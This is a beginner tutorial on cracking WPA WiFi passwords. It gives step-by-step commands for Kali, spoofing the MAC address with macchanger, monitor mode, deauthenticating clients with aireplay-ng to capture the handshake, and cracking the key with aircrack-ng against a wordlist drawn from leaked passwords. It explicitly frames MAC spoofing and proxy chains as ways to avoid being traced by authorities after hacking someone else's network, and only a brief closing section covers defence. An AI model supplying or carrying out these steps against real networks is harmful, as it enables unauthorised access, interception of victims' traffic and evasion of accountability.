WiFi Password Hacking for Beginners Table of Contents:
1) Setting up the lab. (WiFi Password Hacking for Beginners)
In this section, you will learn how to set up the lab for Wi-Fi hacking. You might have an operating system like Windows, Linux or Mac OS X but for hacking, you need a specified operating system like Kali or Backtrack. These operating systems are created for hacking and penetration testing. They have supported almost all of the hacking programs in the wild and built in. The good news is, these operating systems are free.
In this article, we are going to be installing and using Kali. Both of these operating systems (Backtrack and Kali) are Linux flavours but there are few differences. When we install Kali, there will be preinstalled programs that can be used for hacking. Perhaps your worried a new operating system on your computer is going to be a headache to install or going to mess up your system? No worries, there are programs that help you virtualize operating systems. There are two famous programs called “VirtualBox” and “VMware Workstation”. We are going to use VirtualBox because it is free and it has the same functions as paid versions..
VirtualBox is a free and open-source program that lets you virtualize operating systems like Windows, Linux, Mac OS X and even your own operating systems. It supports almost all operating systems. So, you don’t even need to install Kali on your computer you can simply install Kali in VirtualBox and then use it as a common computer.
First of all, download VirtualBox latest version and install it. Here is the link:
If you are using a Windows operating system you should download the version for windows hosts binary release, if you are using Linux download for Linux operating systems and if you are using Mac OS X download for it respectively. We also need something called “Virtualbox Extention Pack” (you can find and download it from VirtualBox download link), which lets us input USBs, wireless adapters and many portable devices.
First, install VirtualBox and then double-click extension pack and click install, installation is very easy, so I am not going to explain it. Find video tutorials for installing VirtualBox and Extention pack here.
Once you have installed it, we need a Kali operating system to install on VirtualBox. Why waste time when you can simply download an already installed Kali?
The easy way: On the Kali website, there is a link to download Kali virtual images, then you can just open these virtual images on VirtualBox and start Kali.
Install fully yourself: Goto https://www.virtualbox.org/wiki/Downloads Then, choose your operating system. If you require support for 32 bit version hosts, then use version 5.2, as this has been discontinued in 6.0. Version 5.2 will remain supported for 32 bit operating systems until July 2020. Get with the program anyway its 2019 get rid of your 32 bit computers.
There are versions for VMware Workstation and for VirtualBox. Remember you must download for VirtualBox no matter what operating system you have. Once you have finished downloading, go to your Downloads folder and search for the Kali virtual image you just downloaded, the extension must be “.ova”, then double-click it and wait until the process ends. If the image has successfully installed, look for settings button and click it.
So first of all, go to the system and correctly enter ram usage for virtual machine (remember, your operating system needs at least two 2GB of ram), then your going to go to the system>processor and enter usage of the processor.
It is very important to setup your network connection, because without that you will not be able to do the WiFi hack with Kali.
To do this, go to the network and choose “Bridged Adapter” this means that the program will use your built-in wireless adapter.
Now you are ready to start the virtual machine.
Click “Start” and wait until the username prompt appears.
The default username is “root”, and the default password is “toor”, but for security reasons, we are going to change it later. The screen should look like this:
On the left side should be a program called “terminal”, click on it and you will see that black screen appears with a red prompt “root@kali#” see image below: (See video tutorial on how to open terminal in Kali.)
You may have a question like “What does root mean?”, well, root is an access type, a type of user for the system, to understand easily this root access is accessible when you have full access over the computer, you can do anything that your computer is able to do (administrator in windows).
If your coming from a Windows background, you may think that “Administrator” is the highest level of access but that is not so for Kali. Highest level of access for Linux or Unix of any flavor is root.
This is where we are going to run our commands. From the terminal, you can run programs easily and do whatever you want.
Our system may be out of date, so first, run the command “apt-get update” to update system and wait until the prompt appears.
The apt-get is a program that lets us update system and install programs easily. With the command “apt-get update” we are calling the apt-get program and telling it to update system files. Once you have updated the system we need to change the password because it is the default, and anyone can access it. See videos on how to use apt-get to update Kali.
To change password open terminal again and run command “passwd”, then it is going to ask you for the old password, enter “toor” and click enter, and enter a new password (whatever strong password you like) and remember it. See videos on how to change the default Kali Linux Password.
Power off virtual machine correctly, click on the button in the upper-right side and then click on the power-off sign. Now we setup everything, and are ready to learn how to hide your identity and become untraceable.
2) Hide Identity and Become Untraceable. (WiFi Password Hacking for Beginners)
In hacking it is a very important thing to be untraceable. To be able to hack is meaningless without hiding your identity. For example, imagine that you hacked someone’s wifi and did not hide your identity, in few days authorities can analyze wifi router and they will find your (the hacker) computer information and finally they will find you and throw you into jail with a 7-foot cellmate named Tiny asking you if you like extra mayo, or what your cell number is:
It is a very crucial part of the entire hacking session to hide your identity and make the hack untraceable. In this section, you are going to learn about how to be anonymous, hide identity and how to become fully untraceable.
Note: It goes without saying, you are breaking into your own home WiFi network and not your nieghbors. :-)
What is a MAC address? – wifi password hacking
A MAC address (media access control address) is a unique identifier assigned to NICs (Network Interface Cards) for communications on the physical network segment. Every computer device has a different MAC address. The MAC address is a built-in (hard-coded) address put into a device when it is created. When your computer starts, The Operating system reads from the hardware device the hard-coded MAC address and places it into memory (RAM). When you are connected to the wireless network, it sends packets to you and then your computer converts this information to websites, movies, music, images, etc…
Imagine that two computers are connected to the wireless network, the first computer wants the website google.com, and the second computer wants amazon.com. The network sends packets to these computers, but how do these computers know what packets to ignore and what packets to receive?
Computers identify packets to receive or ignore by MAC address when the network is sending a packet to a computer, it also writes in the packet the MAC address of the computer it is sending the packet too. That is the way wireless networks and computers are connecting with each other in a nutshell. So, if you do not change your IP and hack someones wireless network, you let them investigate your identity by analyzing the network history. See computer forensics.
How to hide your MAC address? – wifi password hacking
You may be thinking, how you can we change the MAC address if the computer reads it from hardware? You are not going to make modification on the hardware, you are going to change RAM (spoof a MAC address). Remember earlier we mentioned the MAC address is read from the hardware into memory (RAM).
When the computer starts, the MAC address loads in RAM and we are going to change already loaded MAC address from RAM. So, when you change your MAC address authorities will find your fake MAC address and they will not be able to trace hacker to a unique NIC (Network Interface Device). Now you have basic information about what is MAC address, dangers of hacking without changing MAC address, and how authorities can trace you. So how can we change our MAC address?
Change MAC address with Kali – wifi password hacking
Kali has already installed a program called “macchanger” which allows us to change the loaded MAC address in RAM. Remember the reason we choose Kali was because it was designed and includes tools for penetration testing.
Open VirtualBox, start the Kali virtual machine and open terminal. We need to stop our wireless card to change the MAC address. Type in “ifconfig wlan0 down”. The ifconfig is a program, wlan0 is our specific wireless card and the down is the action (or option of the ifconfig command) we want to do. This command will stop every wireless service for our specific network card wlan0 and it is necessary to stop the network card before changing the MAC address.
Then type in the following command “macchanger –help”. This command tells Kali to call macchanger and show help.
There are program usage instructions with the -help command. In my specific case, I will use a random MAC address by entering the following into terminal:
macchanger –random wlan0
macchanger is the program name –random is an option and wlan0 is the specific wireless card name. If everything is correct the screen should look like this:
In the image above you can see the output of the command: macchanger –random wlan0
It shows you what the permanent (built-in in network card) MAC address and its corporation in brackets, and down further it shows that there is a new MAC address which does not have a corporation name. Now we have already changed the MAC address and we need to start hacking right? Wrong. Your not ready for that now, because you do not know what monitor mode is and how to use it. In the next section, you will learn what monitor mode is and how to use it with Kali.
Changing your MAC address is only one great method to avoid detection. You definitely want to use a proxy as well. A proxy will hide your IP making the hack appear it is from another location. See related videos to setting up a proxy in Kali Linux.
Contact us for more information on proxy loops/chains services. Proxy loops/chains services allows you to chain multiple (up to 50 for optimal speed) proxies to connect to each other and then finally wrap your program of choice (we recommend IPVanish) and connect you to the Internet. This masks your IP with many layers and can be a good tool when practicing anonymity. It’s a clear cut solution, the tracer has to deal with different countries, different ISP’s, different laws, and different jurisdictions.
3) Wireless modes. (WiFi Password Hacking for Beginners)
When you want to hack a WiFi network, you need to capture the “handshake”. The handshake is the connection of personal computer and wireless network, it is when network packet and personal computer packets meet each other.
With handshake you do not need to be in WiFi range anymore, you can hack the password with handshake and WiFi name (or SSID, you will learn this later).
Now you need to capture all the packets that are sent through the Wi-Fi router and all personal computers in the network. There is a question like “If the MAC address is used to ensure that each packet gets delivered to the right place then how do we capture it?”, and the answer is that “Yes and no, it is used to send packets to the right destination, and we as hackers can only receive packets that are sent to our MAC address , but this only applies to the default mode of your wireless card, which is ‘managed’ mode, however, there is mode that allows us to capture all the packets in our Wi-Fi range, not only the ones sent to our device, hence the name “monitor mode.”
Now you know the basics and are ready to actually catch the handshake. First of all, change your MAC address, enter into monitor mode by typing in these commands in the photo below:
Here are the commands in terminal to change your NIC (Network Interface Card) to monitor mode, in-case you cannot read them from the image above: Type the following line by line followed by the enter key.
This shuts down your NIC. wlan0 should be replaced with your NIC card
ifconfig wlan0 down
Change the mode of the NIC to monitor mode. wlan0 should be replaced with your NIC card.
iwconfig wlan0 mode monitor
This turns your NIC card back on. wlan0 should be replaced with your NIC card.
ifconfig wlan0 up
This final command is used to set the parameters of the network interface which are specific to the wireless operation (eg. frequency, SSID). iwconfig may also be used to display those parameters, and the wireless statistics. wlan0 should be replaced with your NIC card.
You can see that finally when I checked wlan0 mode (with iwconfig wlan0) it was on monitor as you can see in the image above. So you are ready to actually capture the handshake, then it is very easy to hack the wireless network with the handshake and a wordlist (AKA: dictionary)
NOTE: The wifi password is contained in the handshake. :-)
4) Catching the handshake (WiFi Password Hacking for Beginners)
Handshake packets are sent every time a client associated with the target AP. So to capture it we are going to capture every packet that is sent. In this section, we are going to use a program called “airodump-ng”. This program lets us sniff and capture the packets that are sent over the network. This program is also a pre installed program. There are two steps to catch the handshake.
1) Start airodump-ng on the target AP (Access Point):
The syntax and example look something like this:
Syntax: airodump-ng --channel [channel] –bssid [bssid] –write [file-name] [interface]
Example: airodump-ng –channel 6 –bssid 11:22:33:44:55:66 --write out wlan0mon
2) Wait for a client to connect to the access point or de-authenticate a connected client (if any) so that their system will connect back automatically.
The syntax and example look something like this:
Syntax: aireplay-ng --deauth [number of deauth packets] –a [AP] –c [target] [interfac]
Example: aireplay-ng –deauth 1000 –a 11:22:33:44:55:66 –c 00:AA:11:22:33 mon0
If the handshake is caught, Kali will inform you in top right corner of airodump-ng output will say “WPA handshake” followed by the MAC address.
Follow these steps and when you catch the handshake your screen should like this:
When you catch the handshake you are ready to actually crack the WiFi password. As mentioned previously the wifi password is stored in the handshake. :-)
5) Cracking any wireless network. (WiFi Password Hacking for Beginners)
Now that you have the handshake you need to download the largest wordlist in the world to hack the password. You can download this wordlist from the following website:
There are two versions of this wordlist.
- CrackStation’s main password cracking dictionary (1,493,677,782 words, 15GB) for download.
- CrackStations just the “real human” passwords leaked from various website databases. This smaller list contains just those passwords. There are about 64 million passwords in this list!
What’s in the password/wordlist/dictionary list?
The list contains every wordlist, dictionary, and password database leak that could be found on the internet. It also contains every word in the Wikipedia databases (pages-articles, retrieved 2010, all languages) as well as lots of books from Project Gutenberg. It also includes the passwords from some low-profile database breaches that were being sold in the underground years ago.
The format of the list is a standard text file sorted in non-case-sensitive alphabetical order. Lines are separated with a newline “n” character without the quotes.
You can test the list without downloading it by giving SHA256 hashes to the free hash cracker. Here’s a tool for computing hashes easily. Here are the results of cracking LinkedIn’s and eHarmony’s password hash leaks with the list.
The list is responsible for cracking about 30% of all hashes researched, but that figure should be taken with a grain of salt because some people try hashes of really weak passwords just to test the service, and others try to crack their hashes with other online hash crackers before finding CrackStation. Using the list, we were able to crack 49.98% of one customer’s set of 373,000 human password hashes to motivate their move to a better salting scheme.
When you download a list you are ready to start hacking the network WiFi. We are going to use aircrack-ng to crack the key.
It does this by combining each password in the wordlist with AP access point name (ESSID) to compute a Pairwise Master Key (PMK) using pbkdf2 algorithm, the PMK is then compared to the handshake file.
The syntax and example looks like this:
Syntax: aircrack-ng [handshake filename] –w [wordlist] [interface]
Example: aircrack-ng is-01.cap –w list wlan0mon
Run this syntax and wait for aircrack-ng to crack it. When the password is cracked the screen should look like this:
Congratulations!!! You have just hacked a WPA secured wireless network!!! :-)
It is now time to secure our wireless network because as you know it is very simple to do this WiFi hack, and if someone does do this to your Wifi, they can then capture packets that are sent over the network and analyze them. Inside these packets will be your email password, your social network password, bank or credit card pin and so on. It is very dangerous to not have a secure wireless network.
Next section, you will learn how to secure your network and become almost unhackable.
6) Securing Your Network From The Aforementioned Attacks. (WiFi Password Hacking for Beginners)
Now that we know how to test the security of all known wireless encryptions (WEP/WPA/WPA2), it is relatively easy to secure our networks against these attacks as we know all the weaknesses that can be used by hackers to crack these encryptions. So let us have a look at each of these encryptions one by one:
1. WEP: WEP is old encryption, and it is really weak, as we have seen in the lesson above there are a number of methods that can be used to crack this encryption regardless of the strength of the password and even if there is nobody connected to the network. These attacks are possible because of the way WEP works, we discussed the weakness of WEP and how it can be used to crack password, some of these methods even allow you to crack the key in a few minutes.
2. WPA/WPA2: WPA and WPA2 are very similar, the only difference between them is the algorithm used to encrypt the information but both encryptions work in the same way. WPA/WPA2 can be cracked in two ways:
- If WPS feature is enabled then there is a high chance of obtaining the key regardless of its complexity, this can be done by exploiting a weakness in the WPS feature. WPS is used to allow users to connect to their wireless network without entering the key, this is done by pressing a WPS button on both the router and the device that they want to connect, the authentication works using an eight digit pin, hackers can brute force this pin in a relatively short time (in an average of 10 hours), once they get the right pin they can use a tool called reaver to reverse engineer the pin and get the key, this is all possible due to the fact that the WPS feature uses an easy pin (only 8 characters and only contains digits), so it’s not a weakness in WPA/WPA2, it’s a weakness in a feature that can be enabled on routers that use WPA/WPA2 which can be exploited to get the actual WPA/WPA2 key.
- If WPS is not enabled, then the only way to crack WPA/WPA2 is using a dictionary attack (AKA: brute force), in this attack a list of passwords (dictionary) is compared against a file (handshake file) to check if any of the passwords is the actual key for the network. So, if the password does not exist in the wordlist then the attacker will not be able to find the password.